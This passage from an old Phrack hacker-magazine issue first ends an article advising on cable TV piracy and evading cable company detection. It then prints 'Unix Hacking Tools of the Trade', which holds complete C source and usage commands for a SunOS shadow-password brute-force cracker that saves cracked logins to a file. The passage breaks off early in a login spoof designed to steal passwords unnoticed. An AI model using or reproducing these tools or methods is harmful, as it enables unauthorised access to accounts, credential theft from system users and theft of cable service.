  7317. removes signals at will.  Many systems require a small amp inside the
  7318. house, which the cable company uses to make sure that you don't hook up
  7319. more than one TV.  I believe that the new CATV act makes this illegal,
  7320. and that a customer does not have to pay for any extra sets (which do not
  7321. need equipment) in the house.  Of course, we all know that the cable TV
  7322. company will do whatever it wants until it is threatened with lawsuits.
  7323.  
  7324. Cable boxes use many different methods of descrambling.  Most are not in
  7325. use anymore, with a few still around, and a few around the corner in the
  7326. future.  The big thing to remember is sync suppression.  This method is
  7327. how the cable companies make the picture look like a really fucked up,
  7328. waving Dali painting.  Presently the most popular method is the Tri-mode
  7329. In-band Sync suppression.  The sync signal is suppressed by 0, 6, or 10
  7330. dB.  The sync can be changed randomly once per field, and the information
  7331. necessary for the box to rebuild a sync signal.  This very common system
  7332. is discussed in Radio-Electronics magazine in the 2/87 issue.  There are
  7333. schematics and much more detailed theory than is provided here.
  7334.  
  7335. The other common method currently used is SSAVI, which is most common on
  7336. Zenith boxes.  It stands for Sync Suppression And Video Inversion.  In
  7337. addition to sync suppression, it uses video inversion to also 'scramble'
  7338. the video.  There is no sync signal transmitted separately (or reference
  7339. signal to tell the box how to de-scramble) as the first 26 lines (blank,
  7340. above the picture) are not de-synched, and can be re-synched with a
  7341. phased lock loop - giving sync to the whole field.  The data on inversion
  7342. is sent somewhere in the 20 or 21st line, which is outside of the
  7343. screen.  Audio can be scrambled too, but it is actually just moved to a
  7344. different frequency.  Radio Electronics August 92 on has circuits and
  7345. other info in the Drawing Board column.
  7346.  
  7347. ---Future Systems-
  7348.  
  7349. For Pioneer, the future is now.  The system the new Pioneers use is
  7350. patented and Pioneer doesn't want you to know how it works.  From the
  7351. patent, it appears to use combinations of in-band, out-band, and keys
  7352. (also sending false keys) to scramble and relay info necessary to
  7353. descramble.  These boxes are damn slick.  The relevant patents are US
  7354. #5,113,411 and US #4,149,158 if you care to look.  There is not much
  7355. information to be gained from them.  Look for future updates to this
  7356. article with info on the system if I can find any :)
  7357.  
  7358. Other systems are the VideoCipher + (used on satellites now - this is
  7359. scary shit.)  It uses DES-encrypted audio.  DigiCable and DigiCipher are
  7360. similar, with Digi encrypting the video with DES also  (yikes)...  And
  7361. they all use changing keys and other methods.  Oak Sigma converters use
  7362. similar methods which are available now on cable.  (digital encryption of
  7363. audio, etc...)
  7364.  
  7365. Part II.  How the cable company catches you getting those signals
  7366.  
  7367. There are many methods the CATV company can use to catch you, or at
  7368. least keep you from using certain methods.
  7369.  
  7370. Market Code:   Almost _all_ addressable decoders now use a market code.
  7371.                 This is part of the serial number (which is used for pay
  7372.                 per view addressing) which decodes to a general geographic
  7373.                 region.  Most boxes contain code which tell it to shut
  7374.                 down if it receives a code (which can be going to any box
  7375.                 on the cable system) which is from a different market area.
  7376.                 So if you buy a converter that is say, market-coded for
  7377.                 Los Angeles, you won't be able to use it in New York.
  7378.  
  7379. Bullets:        The bullet is a shut down code like above - it will make
  7380.                 your box say 'bAh' and die.  The method used most is for
  7381.                 the head end to send messages to every box they know of
  7382.                 saying 'ignore the next shutdown message' ... and once
  7383.                 every (legit) box has this info, it sends the bullet.
  7384.                 The only boxes that actually process the bullet are ones
  7385.                 which the CATV system doesn't know about.  P.S.  Don't
  7386.                 call the cable company and complain about cable if you
  7387.                 are using an illegal converter - and be sure to warn
  7388.                 anyone you live with about calling the CATV co. also.
  7389.  
  7390. Leak Detection: The FCC forces all cable companies to drive around and
  7391.                 look for leaks - any poor splice jobs (wiring your house
  7392.                 from a neighbors without sealing it up nice) and some
  7393.                 descramblers will emit RF.  So while the CATV is looking
  7394.                 for the leaks, they may catch you.
  7395.  
  7396. Free T-Shirts: The cable company can, with most boxes, tell the box to
  7397.                 display a different signal.  So they can tell every box
  7398.                 they know of (the legit box pool) to display a commercial
  7399.                 on another channel, while the pirate boxes get this real
  7400.                 cool ad with an 1800 number for free t-shirts... you call,
  7401.                 you get busted.  This is mostly done during PPV boxing or
  7402.                 other events which are paid for - as the company knows
  7403.                 exactly who should get that signal, and can catch even
  7404.                 legit boxes which are modified to receive the fight.
  7405.  
  7406. Your Pals:      Programs like "Turn in a cable pirate and get $100" let
  7407.                 you know who your friends _really_ are.
  7408.  
  7409.  
  7410. Part III:  How to get away with it.
  7411.  
  7412. I get a lot of questions about opening a box that you own.  This is not
  7413. a good idea.  Most, if not ALL boxes today have a tamper sensor.  If you
  7414. open the box, you break a tab, flip a switch, etc...  This disables the
  7415. box and leaves a nice piece of evidence for the CATV co. to show that you
  7416. played with it.
  7417.  
  7418. I also have had questions about the old "unplug the box when it is
  7419. enabled, then plug it back in later"...  The CATV company periodically
  7420. sends a signal to update all the boxes to where they should be.  If you
  7421. want to do this, you'll need to find out where the CATV sends the address
  7422. information, and then you need to trap it out of the signal.  So as soon
  7423. as the fraudulent customer (let's call him Chris) sees his box get the
  7424. signal to receive the PPV porn channel, he installs the trap and now his
  7425. box will never get any pay per view signals again...  but he'll always
  7426. have whatever he was viewing at the time he put the trap in.  Big problem
  7427. here is that most _newer_ systems also tell the box how long it can
  7428. descramble that channel - i.e.  "Watch SPICE until I tell you not to, or 3
  7429. hours have passed"...
  7430.  
  7431. Where to make/buy/get porno boxes:
  7432.  
  7433. You can order a box which has been modified not to accept bullets.  This
  7434. method is pretty expensive.  You can also get a 'pan' descrambler - it is
  7435. a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and
  7436. descrambles it.  These boxes can't be killed by the bullets, and work
  7437. pretty well.  There are some pans which are made by the same company as
  7438. your cable box and are sensitive to bullets, so beware.
  7439.  
  7440. There are two basic ideas for modifying a box (provided you get detailed
  7441. instructions on how to get it open, or how to fix it once you open it).
  7442. You can change the S/N to something which is known as 'universal' or
  7443. disassemble the code and remove the jump to the shutdown code.
  7444. The universal codes are rare, and may be extinct.  Besides, if the cable
  7445. company finds out your code, they can nuke it.  This happens when someone
  7446. who makes (err made) 'universal' chips gets busted.  The modification of
  7447. the actual code is the best way to do it, just forcing a positive
  7448. response to permission checks is the easiest way.
  7449.  
  7450. A 'cube' is not a NeXT, it's a device which removes the data signal from
  7451. the cable line, and inserts a 'nice' data signal which tells your box to
  7452. turn everything on.  A 'destructive' cube actually re-programs all the
  7453. boxes below it to a new serial number and gives that number full
  7454. privileges, while a 'non-destructive' cube needs to know your boxes
  7455. serial number, so it can tell your box (without modifications) that it
  7456. can view everything.  You have to get a new IC if you change boxes, but
  7457. the plus is that you can remove the cube and the box functions as
  7458. normal.  Then again, you have to trust the place you are ordering the
  7459. cube from to not be working for the cable company, as you have to give
  7460. them your box serial number - which the CATV cable has in their records.
  7461. Cubes have been seen for sale in the back of Electronics Now (formerly
  7462. Radio Electronics).
  7463.  
  7464. Of course, you could check in the above mentioned articles and build
  7465. circuitry, it would be a lot cheaper.  The only problem is that you have
  7466. to be good enough not to fuck it up - TV signals are very easy to fuck up.
  7467.  
  7468. Then there is the HOLY GRAIL.  Most scrambling systems mess with the sync
  7469. pulse.  This pulse is followed by the colorburst signal on NTSC video.
  7470. Basically, the grail finds the colorburst and uses it as a reference
  7471. signal.  In theory, it works wonderfully (but does not fix the video
  7472. inversion problems found on SSAVI systems).  However, with the sync pulse
  7473. whacked, the colorburst method may give weak color or color shifts.  The
  7474. schematics are in the May 1990 Radio-Electronics.  I have also received
  7475. email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is
  7476. a modified (supposedly higher quality) version of the R-E schematics.
  7477. The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and
  7478. etched board.  A little steep, but not too bad.  E-mail the above for
  7479. more information.
  7480.  
  7481.  
  7482. Anyway, that's all for now.  Remember, information (including XXX movies)
  7483. wants to be free!
  7484.  
  7485. Carl Corey / dEs
  7486.  
  7487.                               ==Phrack Magazine==
  7488.  
  7489.                  Volume Five, Issue Forty-Six, File 11 of 28
  7490.  
  7491. ****************************************************************************
  7492.  
  7493.  
  7494.                     ***********************************
  7495.                     * Unix Hacking Tools of the Trade *
  7496.                     *                                 *
  7497.                     *                By               *
  7498.                     *                                 *
  7499.                     *  The Shining/UPi (UK Division)  *
  7500.                     ***********************************
  7501.  
  7502. Disclaimer :
  7503.  
  7504. The following text is for educational purposes only and I strongly suggest
  7505. that it is not used for malicious purposes....yeah right!
  7506.  
  7507.  
  7508. Introduction :
  7509.  
  7510. Ok, I decided to release this phile to help out all you guys who wish to
  7511. start hacking unix. Although these programs should compile & run
  7512. on your system if you follow the instructions I have given, knowing a bit
  7513. of C will come in handy if things go wrong. Other docs I suggest you read
  7514. are older 'phrack' issues with shooting sharks various articles on unix,
  7515. and of course, 'Unix from the ground up' by The Prophet.
  7516.  
  7517. This article includes three programs, a SUNOS Brute force Shadow password
  7518. file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
  7519.  
  7520.  
  7521.  
  7522.  
  7523.  
  7524.                                Shadow Crack
  7525.                                ------------
  7526.  
  7527.             SUNOS Unix brute force shadow password file cracker
  7528.             ---------------------------------------------------
  7529.  
  7530. Well, a while back, I saw an article in phrack which included a brute force
  7531. password cracker for unix. This was a nice idea, except that these days
  7532. more and more systems are moving towards the shadow password scheme. This,
  7533. for those of you who are new to unix, involves storing the actual encrypted
  7534. passwords in a different file, usually only accessible to root. A typical
  7535. entry from a System V R4 password file looks like this :-
  7536.  
  7537. root:x:0:1:Sys. admin:/:/bin/sh
  7538.  
  7539.  
  7540. with the actual encrypted password replaced by an 'x' in the /etc/passwd
  7541. file. The encrypted password is stored in a file(in the case of sysV)
  7542. called /etc/shadow which has roughly the following format :-
  7543.  
  7544. root:XyfgFekj95Fpq:::::
  7545.  
  7546.  
  7547. this includes the login i.d., the encrypted password, and various other
  7548. fields which hold info on password ageing etc...(no entry in the other
  7549. fields indicate they are disabled).
  7550.  
  7551. Now this was fine as long as we stayed away from system V's, but now a
  7552. whole load of other companies have jumped on the bandwagon from IBM (aix)
  7553. to Suns SUNOS systems. The system I will be dealing with is SUNOS's
  7554. shadowed system. Now, like sysV, SUNOS also have a system whereby the
  7555. actual encrypted passwords are stored in a file usually called
  7556. /etc/security/passwd.adjunct, and normally this is accessible only by root.
  7557. This rules out the use of brute force crackers, like the one in phrack
  7558. quite a while back, and also modern day programs like CRACK. A typical
  7559. /etc/passwd file entry on shadowed SUNOS systems looks like this :-
  7560.  
  7561. root:##root:0:1:System Administrator:/:/bin/csh
  7562.  
  7563. with the 'shadow' password file taking roughly the same format as that of
  7564. Sys V, usually with some extra fields.
  7565.  
  7566. However, we cannot use a program like CRACK, but SUNOS also supplied a
  7567. function called pwdauth(), which basically takes two arguments, a login
  7568. name and decrypted password, which is then encrypted and compared to the
  7569. appropriate entry in the shadow file, thus if it matches, we have a valid
  7570. i.d. & password, if not, we don't.
  7571.  
  7572. I therefore decided to write a program which would exploit this function,
  7573. and could be used to get valid i.d's and passwords even on a shadowed
  7574. system!
  7575.  
  7576. To my knowledge the use of the pwdauth() function is not logged, but I could
  7577. be wrong. I have left it running for a while on the system I use and it has
  7578. attracted no attention, and the administrator knows his shit. I have seen
  7579. the functions getspwent() and getspwnam() in Sys V to manipulate the
  7580. shadow password file, but not a function like pwdauth() that will actually
  7581. validate the i.d. and password. If such a function does exist on other
  7582. shadowed systems then this program could be very easily modified to work
  7583. without problems.
  7584.  
  7585. The only real beef I have about this program is that because the
  7586. pwdauth() function uses the standard unix crypt() function to encrypt the
  7587. supplied password, it is very slow!!! Even in burst mode, a password file
  7588. with 1000's of users could take a while to get through. My advice is
  7589. to run it in the background and direct all its screen output to /dev/null
  7590. like so :-
  7591.  
  7592. shcrack -mf -uroot -ddict1 > /dev/null &
  7593.  
  7594. Then you can log out then come back and check on it later!
  7595.  
  7596. The program works in a number of modes, all of which I will describe below,
  7597. is command line driven, and can be used to crack both multiple accounts in
  7598. the password file and single accounts specified. It is also NIS/NFS (Sun
  7599. Yellow Pages) compatible.
  7600.  
  7601.  
  7602. How to use it
  7603. -------------
  7604.  
  7605. shcrack  -m[mode]  -p[password file]  -u[user id]  -d[dictionary file]
  7606.  
  7607. Usage :-
  7608.  
  7609. -m[mode]  there are 3 modes of operation :-
  7610.  
  7611. -mb  Burst mode, this scans the password file, trying the minimum number
  7612.      of password guessing strategies on every account.
  7613.  
  7614. -mi  Mini-burst mode, this also scans the password file, and tries most
  7615.      password guessing strategies on every account.
  7616.  
  7617. -mf  Brute-force mode, tries all password strategies, including the use
  7618.      of words from a dictionary, on a single account specified.
  7619.  
  7620.  
  7621. more about these modes in a sec, the other options are :-
  7622.  
  7623.  
  7624. -p[password file]  This is the password file you wish to use, if this is
  7625.                    left unspecified, the default is /etc/passwd.
  7626.                    NB: The program automatically detects and uses the
  7627.                    password file wherever it may be in NIS/NFS systems.
  7628.  
  7629.  
  7630. -u[user id]  The login i.d. of the account you wish to crack, this is used
  7631.              in Brute-force single user mode.
  7632.  
  7633.  
  7634. -d[dict file]  This uses the words in a dictionary file to generate
  7635.                possible passwords for use in single user brute force
  7636.                mode. If no filename is specified, the program only uses the
  7637.                password guessing strategies without using the dictionary.
  7638.  
  7639.  
  7640. Modes
  7641. ^^^^^
  7642.  
  7643. -mb  Burst mode basically gets each account from the appropriate password
  7644.      file and uses two methods to guess its password. Firstly, it uses the
  7645.      account name as a password, this name is then reversed and tried as a
  7646.      possible password. This may seem like a weak strategy, but remember,
  7647.      the users passwords are already shadowed, and therefore are deemed to
  7648.      be secure. This can lead to sloppy passwords being used, and I have
  7649.      came across many cases where the user has used his/her i.d. as a
  7650.      password.
  7651.  
  7652.  
  7653. -mi Mini-burst mode uses a number of other password generating methods
  7654.     as well as the 2 listed in burst mode. One of the methods involves
  7655.     taking the login i.d. of the account being cracked, and appending the
  7656.     numbers 0 to 9 to the end of it to generate possible passwords. If
  7657.     this mode has no luck, it then uses the accounts gecos 'comment'
  7658.     information from the password file, splitting it into words and
  7659.     trying these as passwords. Each word from the comment field is also
  7660.     reversed and tried as a possible password.
  7661.  
  7662.  
  7663. -mf Brute-force single user mode uses all the above techniques for password
  7664.     guessing as well as using a dictionary file to provide possible
  7665.     passwords to crack a single account specified. If no dictionary filename
  7666.     is given, this mode operates on the single account using the
  7667.     same methods as mini-burst mode, without the dictionary.
  7668.  
  7669.  
  7670. Using shadow crack
  7671. ------------------
  7672.  
  7673. To get program help from the command line just type :-
  7674.  
  7675. $ shcrack <RETURN>
  7676.  
  7677. which will show you all the modes of operation.
  7678.  
  7679. If you wanted to crack just the account 'root', located in
  7680. /etc/passwd(or elsewhere on NFS/NIS systems), using all methods
  7681. including a dictionary file called 'dict1', you would do :-
  7682.  
  7683. $ shcrack -mf -uroot -ddict1
  7684.  
  7685.  
  7686. to do the above without using the dictionary file, do :-
  7687.  
  7688. $ shcrack -mf -uroot
  7689.  
  7690.  
  7691. or to do the above but in password file 'miner' do :-
  7692.  
  7693. $ shcrack -mf -pminer -uroot
  7694.  
  7695.  
  7696. to start cracking all accounts in /etc/passwd, using minimum password
  7697. strategies do :-
  7698.  
  7699. $ shcrack -mb
  7700.  
  7701.  
  7702. to do the above but on a password file called 'miner' in your home
  7703. directory do :-
  7704.  
  7705. $ shcrack -mb -pminer
  7706.  
  7707.  
  7708. to start cracking all accounts in 'miner', using all strategies except
  7709. dictionary words do :-
  7710.  
  7711. $ shcrack -mi -pminer
  7712.  
  7713.  
  7714. ok, heres the code, ANSI C Compilers only :-
  7715.  
  7716. ---cut here-------------------------------------------------------------------
  7717.  
  7718. /* Program   : Shadow Crack
  7719.    Author    : (c)1994 The Shining/UPi (UK Division)
  7720.    Date      : Released 12/4/94
  7721.    Unix type : SUNOS Shadowed systems only */
  7722.  
  7723. #include <stdio.h>
  7724. #include <pwd.h>
  7725. #include <string.h>
  7726. #include <ctype.h>
  7727. #include <signal.h>
  7728.  
  7729. #define WORDSIZE 20     /* Maximum word size */
  7730. #define OUTFILE "data"  /* File to store cracked account info */
  7731.  
  7732. void word_strat( void ), do_dict( void );
  7733. void add_nums( char * ), do_comment( char * );
  7734. void try_word( char * ), reverse_word( char * );
  7735. void find_mode( void ), burst_mode( void );
  7736. void mini_burst( void ), brute_force( void );
  7737. void user_info( void ), write_details( char * );
  7738. void pwfile_name( void ), disable_interrupts( void ), cleanup();
  7739.  
  7740.  
  7741. char *logname, *comment, *homedir, *shell, *dict, *mode,
  7742.      *pwfile, *pwdauth();
  7743. struct passwd *getpwnam(), *pwentry;
  7744. extern char *optarg;
  7745. int option, uid, gid;
  7746.  
  7747.  
  7748. int main( int argc, char **argv )
  7749. {
  7750. disable_interrupts();
  7751. system("clear");
  7752.  
  7753. if (argc < 2) {
  7754. printf("Shadow Crack - (c)1994 The Shining\n");
  7755. printf("SUNOS Shadow password brute force cracker\n\n");
  7756. printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
  7757. printf("-d[dictfile]\n\n\n");
  7758. printf("[b] is burst mode, scans pwfile trying minimum\n");
  7759. printf("    password strategies on all i.d's\n\n");
  7760. printf("[i] is mini-burst mode, scans pwfile trying both\n");
  7761. printf("    userid, gecos info, and numbers to all i.d's\n\n");
  7762. printf("[f] is bruteforce mode, tries all above stategies\n");
  7763. printf("    as well as dictionary words\n\n");
  7764. printf("[pwfile]   Uses the password file [pwfile], default\n");
  7765. printf("           is /etc/passwd\n\n");
  7766. printf("[loginid]  Account you wish to crack, used with\n");
  7767. printf("           -mf bruteforce mode only\n\n");
  7768. printf("[dictfile] uses dictionary file [dictfile] to\n");
  7769. printf("           generate passwords when used with\n");
  7770. printf("           -mf bruteforce mode only\n\n");
  7771. exit(0);
  7772. }
  7773.  
  7774.  
  7775. /* Get options from the command line and store them in different
  7776.    variables */
  7777.  
  7778. while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
  7779.  switch(option)
  7780.  {
  7781.    case 'm':
  7782.            mode = optarg;
  7783.            break;
  7784.  
  7785.    case 'p':
  7786.            pwfile = optarg;
  7787.            break;
  7788.  
  7789.    case 'u':
  7790.            logname = optarg;
  7791.            break;
  7792.  
  7793.    case 'd':
  7794.            dict = optarg;
  7795.            break;
  7796.  
  7797.    default:
  7798.            printf("wrong options\n");
  7799.            break;
  7800.  }
  7801.  
  7802. find_mode();
  7803. }
  7804.  
  7805.  
  7806. /* Routine to redirect interrupts */
  7807.  
  7808. void disable_interrupts( void )
  7809. {
  7810. signal(SIGHUP, SIG_IGN);
  7811.  signal(SIGTSTP, cleanup);
  7812.   signal(SIGINT, cleanup);
  7813.  signal(SIGQUIT, cleanup);
  7814. signal(SIGTERM, cleanup);
  7815. }
  7816.  
  7817.  
  7818. /* If CTRL-Z or CTRL-C is pressed, clean up & quit */
  7819.  
  7820. void cleanup( void )
  7821. {
  7822. FILE *fp;
  7823.  
  7824. if ((fp = fopen("gecos", "r")) != NULL)
  7825.    remove("gecos");
  7826.  
  7827. if ((fp = fopen("data", "r")) == NULL)
  7828.    printf("\nNo accounts cracked\n");
  7829.  
  7830. printf("Quitting\n");
  7831. exit(0);
  7832. }
  7833.  
  7834.  
  7835. /* Function to decide which mode is being used and call appropriate
  7836.    routine */
  7837.  
  7838. void find_mode( void )
  7839. {
  7840.  if (strcmp(mode, "b") == NULL)
  7841.     burst_mode();
  7842.  else
  7843.  if (strcmp(mode, "i") == NULL)
  7844.     mini_burst();
  7845.  else
  7846.  if (strcmp(mode, "f") == NULL)
  7847.     brute_force();
  7848.  else
  7849.   {
  7850.     printf("Sorry - No such mode\n");
  7851.     exit(0);
  7852.   }
  7853. }
  7854.  
  7855.  
  7856. /* Get a users information from the password file */
  7857.  
  7858. void user_info( void )
  7859. {
  7860.   uid = pwentry->pw_uid;
  7861.    gid = pwentry->pw_gid;
  7862.     comment = pwentry->pw_gecos;
  7863.    homedir = pwentry->pw_dir;
  7864.   shell = pwentry->pw_shell;
  7865. }
  7866.  
  7867.  
  7868.  
  7869. /* Set the filename of the password file to be used, default is
  7870.    /etc/passwd */
  7871.  
  7872. void pwfile_name( void )
  7873. {
  7874. if (pwfile != NULL)
  7875.     setpwfile(pwfile);
  7876. }
  7877.  
  7878.  
  7879.  
  7880. /* Burst mode, tries user i.d. & then reverses it as possible passwords
  7881.    on every account found in the password file */
  7882.  
  7883. void burst_mode( void )
  7884. {
  7885. pwfile_name();
  7886. setpwent();
  7887.  
  7888.   while ((pwentry = getpwent()) != (struct passwd *) NULL)
  7889.   {
  7890.      logname = pwentry->pw_name;
  7891.       user_info();
  7892.       try_word( logname );
  7893.      reverse_word( logname );
  7894.   }
  7895.  
  7896. endpwent();
  7897. }
  7898.  
  7899.  
  7900. /* Mini-burst mode, try above combinations as well as other strategies
  7901.    which include adding numbers to the end of the user i.d. to generate
  7902.    passwords or using the comment field information in the password
  7903.    file */
  7904.  
  7905. void mini_burst( void )
  7906. {
  7907. pwfile_name();
  7908. setpwent();
  7909.  
  7910.   while ((pwentry = getpwent()) != (struct passwd *) NULL)
  7911.   {
  7912.      logname = pwentry->pw_name;
  7913.       user_info();
  7914.      word_strat();
  7915.   }
  7916.  
  7917. endpwent();
  7918. }
  7919.  
  7920.  
  7921. /* Brute force mode, uses all the above strategies as well using a
  7922.    dictionary file to generate possible passwords */
  7923.  
  7924. void brute_force( void )
  7925. {
  7926. pwfile_name();
  7927. setpwent();
  7928.  
  7929.   if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
  7930.      printf("Sorry - User unknown\n");
  7931.      exit(0);
  7932.   }
  7933.   else
  7934.   {
  7935.      user_info();
  7936.       word_strat();
  7937.      do_dict();
  7938.   }
  7939.  
  7940. endpwent();
  7941. }
  7942.  
  7943.  
  7944. /* Calls the various password guessing strategies */
  7945.  
  7946. void word_strat()
  7947. {
  7948.  try_word( logname );
  7949.   reverse_word( logname );
  7950.    add_nums( logname );
  7951.   do_comment( comment );
  7952. }
  7953.  
  7954.  
  7955. /* Takes the user name as its argument and then generates possible
  7956.    passwords by adding the numbers 0-9 to the end. If the username
  7957.    is greater than 7 characters, don't bother */
  7958.  
  7959. void add_nums( char *wd )
  7960. {
  7961. int i;
  7962. char temp[2], buff[WORDSIZE];
  7963.  
  7964. if (strlen(wd) < 8) {
  7965.  
  7966.   for (i = 0; i < 10; i++)
  7967.   {
  7968.       strcpy(buff, wd);
  7969.        sprintf(temp, "%d", i);
  7970.         strcat(wd, temp);
  7971.        try_word( wd );
  7972.       strcpy(wd, buff);
  7973.   }
  7974.  
  7975.  }
  7976. }
  7977.  
  7978.  
  7979.  
  7980. /* Gets info from the 'gecos' comment field in the password file,
  7981.    then process this information generating possible passwords from it */
  7982.  
  7983. void do_comment( char *wd )
  7984. {
  7985. FILE *fp;
  7986.  
  7987. char temp[2], buff[WORDSIZE];
  7988. int c,  flag;
  7989.  
  7990. flag = 0;
  7991.  
  7992.  
  7993. /* Open file & store users gecos information in it. w+ mode
  7994.    allows us to write to it & then read from it. */
  7995.  
  7996. if ((fp = fopen("gecos", "w+")) == NULL) {
  7997.     printf("Error writing gecos info\n");
  7998.    exit(0);
  7999. }
  8000.  
  8001.     fprintf(fp, "%s\n", wd);
  8002.    rewind(fp);
  8003.  
  8004. strcpy(buff, "");
  8005.  
  8006.  
  8007. /* Process users gecos information, separate words by checking for the
  8008.    ',' field separater or a space. */
  8009.  
  8010. while ((c = fgetc(fp)) != EOF)
  8011. {
  8012.  
  8013.  if (( c != ',' ) && ( c != ' ' )) {
  8014.      sprintf(temp, "%c", c);
  8015.     strncat(buff, temp, 1);
  8016.  }
  8017.  else
  8018.     flag = 1;
  8019.  
  8020.  
  8021.    if ((isspace(c)) || (c == ',') != NULL) {
  8022.  
  8023.      if (flag == 1) {
  8024.         c=fgetc(fp);
  8025.  
  8026.         if ((isspace(c)) || (iscntrl(c) == NULL))
  8027.            ungetc(c, fp);
  8028.      }
  8029.  
  8030.      try_word(buff);
  8031.       reverse_word(buff);
  8032.        strcpy(buff, "");
  8033.       flag = 0;
  8034.      strcpy(temp, "");
  8035.    }
  8036.  
  8037. }
  8038. fclose(fp);
  8039. remove("gecos");
  8040. }
  8041.  
  8042.  
  8043.  
  8044. /* Takes a string of characters as its argument(in this case the login
  8045.    i.d., and then reverses it */
  8046.  
  8047. void reverse_word( char *wd )
  8048. {
  8049. char temp[2], buff[WORDSIZE];
  8050. int i;
  8051.  
  8052. i = strlen(wd) + 1;
  8053.  strcpy(temp, "");
  8054. strcpy(buff, "");
  8055.  
  8056.  do
  8057.  {
  8058.     i--;
  8059.     if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
  8060.         sprintf(temp, "%c", wd[i]);
  8061.        strncat(buff, temp, 1);
  8062.     }
  8063.  
  8064.  } while(i != 0);
  8065.  
  8066. if (strlen(buff) > 1)
  8067.    try_word(buff);
  8068. }
  8069.  
  8070.  
  8071.  
  8072. /* Read one word at a time from the specified dictionary for use
  8073.    as possible passwords, if dictionary filename is NULL, ignore
  8074.    this operation */
  8075.  
  8076. void do_dict( void )
  8077. {
  8078. FILE *fp;
  8079. char buff[WORDSIZE], temp[2];
  8080. int c;
  8081.  
  8082. strcpy(buff, "");
  8083. strcpy(temp, "");
  8084.  
  8085.  
  8086. if (dict == NULL)
  8087.    exit(0);
  8088.  
  8089.    if ((fp = fopen(dict, "r")) == NULL) {
  8090.        printf("Error opening dictionary file\n");
  8091.       exit(0);
  8092.    }
  8093.  
  8094. rewind(fp);
  8095.  
  8096.  
  8097.  while ((c = fgetc(fp)) != EOF)
  8098.  {
  8099.   if ((c != ' ') || (c != '\n')) {
  8100.      strcpy(temp, "");
  8101.       sprintf(temp, "%c", c);
  8102.      strncat(buff, temp, 1);
  8103.   }
  8104.  
  8105.   if (c == '\n') {
  8106.     if (buff[0] != ' ')
  8107.        try_word(buff);
  8108.  
  8109.       strcpy(buff, "");
  8110.   }
  8111.  }
  8112.  
  8113. fclose(fp);
  8114. }
  8115.  
  8116.  
  8117. /* Process the word to be used as a password by stripping \n from
  8118.    it if necessary, then use the pwdauth() function, with the login
  8119.    name and word to attempt to get a valid id & password */
  8120.  
  8121. void try_word( char pw[] )
  8122. {
  8123. int pwstat, i, pwlength;
  8124. char temp[2], buff[WORDSIZE];
  8125.  
  8126. strcpy(buff, "");
  8127. pwlength = strlen(pw);
  8128.  
  8129. for (i = 0; i != pwlength; i++)
  8130. {
  8131.  
  8132.  if (pw[i] != '\n') {
  8133.      strcpy(temp, "");
  8134.      sprintf(temp, "%c", pw[i]);
  8135.     strncat(buff, temp, 1);
  8136.  }
  8137. }
  8138.  
  8139.  if (strlen(buff) > 3 ) {
  8140.      printf("Trying : %s\n", buff);
  8141.  
  8142.      if (pwstat = pwdauth(logname, buff) == NULL) {
  8143.          printf("Valid Password! - writing details to 'data'\n");
  8144.  
  8145.          write_details(buff);
  8146.  
  8147.         if (strcmp(mode, "f") == NULL)
  8148.            exit(0);
  8149.      }
  8150.  }
  8151. }
  8152.  
  8153.  
  8154.  
  8155. /* If valid account & password, store this, along with the accounts
  8156.    uid, gid, comment, homedir & shell in a file called 'data' */
  8157.  
  8158. void write_details( char *pw )
  8159. {
  8160. FILE *fp;
  8161.  
  8162. if ((fp = fopen(OUTFILE, "a")) == NULL) {
  8163.     printf("Error opening output file\n");
  8164.    exit(0);
  8165. }
  8166.  
  8167. fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
  8168.  fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
  8169. fclose(fp);
  8170. }
  8171.  
  8172. ---cut here-------------------------------------------------------------------
  8173.  
  8174. again to compile it do :-
  8175.  
  8176. $ gcc shcrack.c -o shcrack
  8177.  
  8178. or
  8179.  
  8180. $ acc shcrack.c -o shcrack
  8181.  
  8182. this can vary depending on your compiler.
  8183.  
  8184.  
  8185.  
  8186.  
  8187.                          The Ultimate Login Spoof
  8188.                          ^^^^^^^^^^^^^^^^^^^^^^^^
  8189.  
  8190. Well this subject has been covered many times before but its a while since
  8191. I have seen a good one, and anyway I thought other unix spoofs have had two
  8192. main problems :-
  8193.  
  8194. 1) They were pretty easy to detect when running
  8195. 2) They recorded any only shit entered.....
  8196.  
  8197.  
  8198. Well now I feel these problems have been solved with the spoof below.
  8199. Firstly, I want to say that no matter how many times spoofing is deemed as
  8200. a 'lame' activity, I think it is very underestimated.
  8201.  
  8202.  
  8203. When writing this I have considered every possible feature such a program
  8204. should have. The main ones are :-
  8205.  
  8206.  
  8207. 1) To validate the entered login i.d. by searching for it in the
  8208.    password file.
  8209.  
  8210. 2) Once validated, to get all information about the account entered
  8211.    including - real name etc from the comment field, homedir info
  8212.    (e.g. /homedir/miner) and the shell the account is using and
  8213.    store all this in a file.
  8214.  
  8215. 3) To keep the spoofs tty idle time to 0, thus not to arouse the
  8216.    administrators suspicions.
  8217.  
  8218. 4) To validates passwords before storing them, on all unshadowed unix systems
  8219.    & SUNOS shadowed/unshadowed systems.
  8220.  
  8221. 5) To emulates the 'sync' dummy account, thus making it act like the
  8222.    real login program.
  8223.  
  8224. 6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
  8225.    quit if it has not grabbed an account within a specified time.
  8226.  
  8227. 7) To automatically detect & display the hostname before the login prompt
  8228.    e.g. 'ccu login:', this feature can be disabled if desired.
  8229.  
  8230. 8) To run continuously until a valid i.d. & valid password are entered.
  8231.  
  8232.  
  8233.  
  8234. As well as the above features, I also added a few more to make the spoof
  8235. 'foolproof'. At university, a lot of the users have been 'stung' by
  8236. login spoofs in the past, and so have become very conscious about security.
  8237.  
  8238. For example, they now try and get around spoofs by entering any old crap when
  8239. prompted for their login name, or to hit return a few times, to prevent any
  8240. 'crappy' spoofs which may be running. This is where my spoof shines!,
  8241. firstly if someone was to enter -
  8242.  
  8243. login: dhfhfhfhryr
  8244. Password:
  8245.  
  8246.  
  8247. into the spoof, it checks to see if the login i.d. entered is
  8248. valid by searching for it in the password file. If it exists, the
